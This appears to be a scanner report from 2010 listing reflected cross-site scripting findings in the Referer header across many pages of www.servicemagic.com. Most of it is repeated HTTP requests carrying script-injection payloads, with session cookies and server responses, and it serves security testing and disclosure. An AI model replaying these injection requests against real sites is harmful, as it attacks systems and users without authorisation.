Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=39955"><script>alert(1)</script>20654db5c4
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:18:05 GMT
Server: Apache/2
Vary: Accept-Encoding
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26312"><script>alert(1)</script>3a5e59c2b72 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash have provided ways of causing another user's browser to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /resources.dg.Windows.42.html HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=26312"><script>alert(1)</script>3a5e59c2b72
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:18:03 GMT
Server: Apache/2
Vary: Accept-Encoding
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2404"><script>alert(1)</script>6d600d14d2b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash have provided ways of causing another user's browser to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /resources.dg.project.Peachtree.87.116.210473.html HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=d2404"><script>alert(1)</script>6d600d14d2b
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:18:08 GMT
Server: Apache/2
Vary: Accept-Encoding
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5eea9"><script>alert(1)</script>322aae41a6e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash have provided ways of causing another user's browser to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /resources.dg.project.Vinyl-Windows-.42.74.321268.html HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=5eea9"><script>alert(1)</script>322aae41a6e
Response (redirected)
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:18:20 GMT
Server: Apache/2
Vary: Accept-Encoding
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4d2b"><script>alert(1)</script>54678a0cd69 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash have provided ways of causing another user's browser to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /resources.home-improvement.html HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=f4d2b"><script>alert(1)</script>54678a0cd69
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:16:29 GMT
Server: Apache/2
Vary: Accept-Encoding
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!-- /rfs/resources/homeownersResources.jsp -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5799d"><script>alert(1)</script>5ed2f789493 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash have provided ways of causing another user's browser to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /resources.tools.html HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=5799d"><script>alert(1)</script>5ed2f789493
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:18:41 GMT
Server: Apache/2
Vary: Accept-Encoding
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e13fd"><script>alert(1)</script>52ba572902d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash have provided ways of causing another user's browser to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /rfs/aboutus/privacyStatement.jsp HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=e13fd"><script>alert(1)</script>52ba572902d
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:18:31 GMT
Server: Apache/2
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d054"><script>alert(1)</script>b73ffd054e7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash have provided ways of causing another user's browser to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /rfs/home/guestHome.jsp HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=6d054"><script>alert(1)</script>b73ffd054e7
Response (redirected)
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:15:56 GMT
Server: Apache/2
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a397d"><script>alert(1)</script>92231f95331 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash have provided ways of causing another user's browser to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /servlet/AffiliateSignupServlet HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=a397d"><script>alert(1)</script>92231f95331
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:16:23 GMT
Server: Apache/2
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 960e3"><script>alert(1)</script>23cac65e19e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash have provided ways of causing another user's browser to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /servlet/TermsServlet HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=960e3"><script>alert(1)</script>23cac65e19e
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:16:31 GMT
Server: Apache/2
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf97d"><script>alert(1)</script>c9d60a7d296 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash have provided ways of causing another user's browser to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /sitesearch/SiteSearchServlet HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=bf97d"><script>alert(1)</script>c9d60a7d296
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:15:55 GMT
Server: Apache/2
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a166a"><script>alert(1)</script>fd92c83ed89 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash have provided ways of causing another user's browser to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /videos/ HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971;
Referer: http://www.google.com/search?hl=en&q=a166a"><script>alert(1)</script>fd92c83ed89
Response
HTTP/1.0 200 OK
Date: Tue, 14 Dec 2010 19:18:39 GMT
Server: Apache/2
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">